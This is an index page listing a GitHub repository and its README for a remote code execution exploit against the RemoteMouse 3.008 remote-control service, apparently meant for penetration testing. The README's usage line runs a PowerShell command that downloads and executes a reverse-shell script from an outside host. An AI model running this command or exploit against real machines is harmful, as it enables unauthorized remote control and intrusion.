Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/p0dalirius/remotemouse-3.008-exploit
This exploit allows to connect to the remote RemoteMouse 3.008 service to virtually press arbitrary keys and execute code on the machine.
https://github.com/p0dalirius/remotemouse-3.008-exploit
exploit pentest remote-control remotemouse
Last synced: about 1 month ago
JSON representation
This exploit allows to connect to the remote RemoteMouse 3.008 service to virtually press arbitrary keys and execute code on the machine.
- Host: GitHub
- URL: https://github.com/p0dalirius/remotemouse-3.008-exploit
- Owner: p0dalirius
- Created: 2021-12-17T06:46:29.000Z (about 3 years ago)
- Default Branch: master
- Last Pushed: 2024-12-15T20:34:55.000Z (about 2 months ago)
- Last Synced: 2024-12-15T21:28:00.081Z (about 2 months ago)
- Topics: exploit, pentest, remote-control, remotemouse
- Language: Python
- Homepage: https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/
- Size: 1.99 MB
- Stars: 46
- Watchers: 2
- Forks: 12
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
Awesome Lists containing this project
README
# RemoteMouse-3.008-Exploit
The RemoteMouse application is a program for remotely controlling a computer from a phone or tablet. This exploit allows to connect to the remote RemoteMouse service to virtually press arbitrary keys and execute code on the machine.
## Video Proof of Concept
https://user-images.githubusercontent.com/79218792/146586908-6389683b-a32a-478d-8eb5-5459e96e86f9.mp4
## Usage
```bash
./RemoteMouse-3.008-Exploit.py --target-ip --cmd "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.2.51:8000/revshell.ps1')\""
```## Contributing
Pull requests are welcome. Feel free to open an issue if you want to add other features.
## References
- https://podalirius.net/en/articles/writing-an-exploit-for-remotemouse-3.008/